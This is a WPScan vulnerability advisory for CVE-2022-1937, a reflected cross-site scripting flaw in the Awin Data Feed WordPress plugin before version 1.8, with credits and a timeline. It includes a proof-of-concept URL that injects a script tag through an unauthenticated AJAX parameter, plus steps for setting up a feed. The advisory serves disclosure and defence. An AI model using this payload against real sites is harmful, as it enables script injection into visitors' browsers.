WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Awin Data Feed < 1.8 - Reflected Cross-Site Scripting

Description

The plugin does not sanitise and escape a parameter before outputting it back via an AJAX action (available to both unauthenticated and authenticated users), leading to a Reflected Cross-Site Scripting

Proof of Concept

With a feed set in the plugin, open the URL below:

https://example.com/wp-admin/admin-ajax.php?action=get_sw_product&title=%3Cscript%3Ealert(`xss`);%3C/script%3E


Note: To set a feed, simply import the following CSV via the plugin:

categoryName,awDeepLink,merchantDeepLink,awImageUrl,description,productName,deliveryCost,currency,price
categoryName,awDeepLink,merchantDeepLink,awImageUrl,description,productName,deliveryCost,currency,price

Affects Plugins

awin-data-feed
Fixed in version 1.8

References

CVE
CVE-2022-1937

Classification

Type

XSS

OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Original Researcher

cydave

Submitter

cydave

Submitter website
https://cyllective.com/
Submitter twitter
cyllective
Verified

Yes

WPVDB ID
eb40ea5d-a463-4947-9a40-d55911ff50e9

Timeline

Publicly Published

2022-06-16 (about 3 months ago)

Added

2022-06-16 (about 3 months ago)

Last Updated

2022-07-27 (about 2 months ago)

Our Other Services

WPScan WordPress Security Plugin